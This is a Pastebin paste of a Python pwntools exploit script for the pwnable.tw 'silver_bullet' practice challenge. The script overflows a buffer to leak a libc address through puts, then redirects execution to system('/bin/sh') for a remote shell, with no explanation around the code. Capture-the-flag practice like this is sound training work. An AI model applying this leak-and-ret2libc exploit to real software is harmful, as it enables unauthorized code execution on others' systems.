SHARE
TWEET

silver_bullet

finalshare Aug 11th, 2018 77 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. import sys
  2. from pwn import *
  3. env = {
  4.     "LD_PRELOAD": "./libc_32.so.6" 
  5. }
  6. glibc=ELF("./libc_32.so.6")
  7. print glibc.symbols['system']
  8. context(os='linux', arch='i386', log_level='debug')
  9. GDB = 1
  10. base=0
  11. if len(sys.argv) >1:
  12.     r = remote("chall.pwnable.tw", 10103)
  13. else:
  14.     r = process("./silver_bullet",aslr=False)
  15.     if (GDB):
  16.     gdb.attach(r,gdbscript='''
  17.         b* 0x08048A18
  18.         c
  19.         ''')   
  20. def create(des):
  21.     r.sendline("1")
  22.     r.recvuntil("Give me your description of bullet :")
  23.     r.send(des)
  24.     r.recvuntil("Good luck !!")
  25. def powerup(des):
  26.     r.sendline("2")
  27.     r.recvuntil("Give me your another description of bullet :")
  28.     r.send(des)
  29.     r.recvuntil("Enjoy it !")
  30. def beat():
  31.     r.sendline("3")
  32. def main():
  33.     create(cyclic(47))
  34.    
  35.     powerup(cyclic(1))
  36.     pos=7
  37.     payload="A"*7
  38.     payload+=p32(0x080484A8)
  39.     payload+=p32(0x080484F0)
  40.     payload+=p32(0x0804AFDC)
  41.     powerup(payload)
  42.     beat()
  43.     beat()
  44.     r.recvuntil("Oh ! You win !!\n")
  45.     puts=u32(r.recv(4))
  46.     base=puts-glibc.symbols['puts']
  47.     glibc.address=base
  48.    
  49.     log.success("BASE: "+hex(glibc.address))
  50.     log.success("SYSTEM: "+hex(glibc.symbols["system"]))
  51.     log.success("\\bin\\sh: "+hex(next(glibc.search('/bin/sh\x00'))))
  52.     create(cyclic(47))
  53.    
  54.     powerup(cyclic(1))
  55.     pos=7
  56.     payload="A"*7
  57.     payload+=p32(glibc.symbols["system"])
  58.     payload+=p32(0x080484F0)
  59.     payload+=p32(next(glibc.search('/bin/sh\x00')))
  60.     powerup(payload)
  61.     beat()
  62.     beat()
  63.     r.interactive()
  64.    
  65. if __name__ == "__main__":
  66.     main()
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!
 
Top